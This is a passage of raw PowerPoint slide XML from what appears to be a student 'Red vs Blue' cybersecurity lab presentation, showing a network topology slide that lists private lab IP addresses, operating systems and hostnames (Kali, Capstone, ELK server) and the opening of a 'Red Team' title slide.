          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Topology </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;1052;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{06F6478D-EE5D-43ED-9C02-61939D4513AA}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="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Google Shape;1057;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442080" y="687600"/>
            <a:ext cx="6216840" cy="4185000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId1"/>
            <a:srcRect l="0" t="1112" r="0" b="1105"/>
            <a:stretch/>
          </a:blipFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056360" y="910440"/>
            <a:ext cx="1813680" cy="3784320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="dbd9e8"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Address Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Netmask:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t> 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Gateway:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Windows 10 Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Red vs Blue (ML-RefVm-684427)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali Linux 5.4.0</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>ELK Sever</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12600" y="0"/>
            <a:ext cx="6699240" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>Azure Network (Red vs Blue)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7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3" name="Google Shape;1065;p58" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="289800"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;1066;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{8CAEA071-C585-4BC8-A4BF-B67843D41A5C}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1851120"/>
            <a:ext cx="8595000" cy="1029240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
